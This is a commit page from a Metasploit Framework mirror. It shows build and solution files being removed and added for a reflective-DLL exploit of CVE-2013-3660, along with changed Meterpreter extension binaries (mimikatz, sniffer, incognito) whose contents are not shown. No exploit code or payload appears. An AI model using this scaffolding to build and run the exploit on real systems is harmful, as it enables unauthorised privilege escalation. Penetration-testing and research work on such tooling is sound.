infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into submodule 

Conflicts:
	external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
bug/bundler_fix
Meatballs 2013-12-08 18:25:03 +00:00
parent 6edd9aa736 0c5d748fca
commit ab1ddac0c8
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
116 changed files with 2458 additions and 1514 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.mailmap
View File

@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com> wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com> wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu> wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees. Below this paragraph are # Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at # volunteers, former employees, and potential Rapid7 employees who, at
@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)> Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be> corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be> corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com> darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com> efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <> efraintorres <efraintorres@github> et <>

BIN
data/exploits/cve-2013-3660/exploit.dll
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

20
external/source/exploits/cve-2013-3660/dll/reflective_dll.sln vendored
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

357
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj vendored
View File

@ -1,357 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="reflective_dll"
ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
RootNamespace="reflective_dll"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="0"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
WholeProgramOptimization="false"
PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="2"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="$(OutDir)\$(ProjectName).x64.dll"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\src\ReflectiveDll.c"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\src\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.h"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

270
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj vendored
View File

@ -1,270 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
<RootNamespace>reflective_dll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v100</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>exploit</TargetName>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>true</BufferSecurityCheck>
<CompileAs>Default</CompileAs>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
</Link>
<PostBuildEvent>
<Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
<ClCompile Include="src\ReflectiveDll.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
<ClInclude Include="src\ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

32
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters vendored
View File

@ -1,32 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\ReflectiveLoader.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ReflectiveDLLInjection.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ReflectiveLoader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ComplexPath.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

18
external/source/exploits/cve-2013-3660/make.msbuild vendored Executable file
View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="ppr_flatten_rec is not supported in x64" />
</Target>
</Project>

22
external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln vendored Executable file
View File

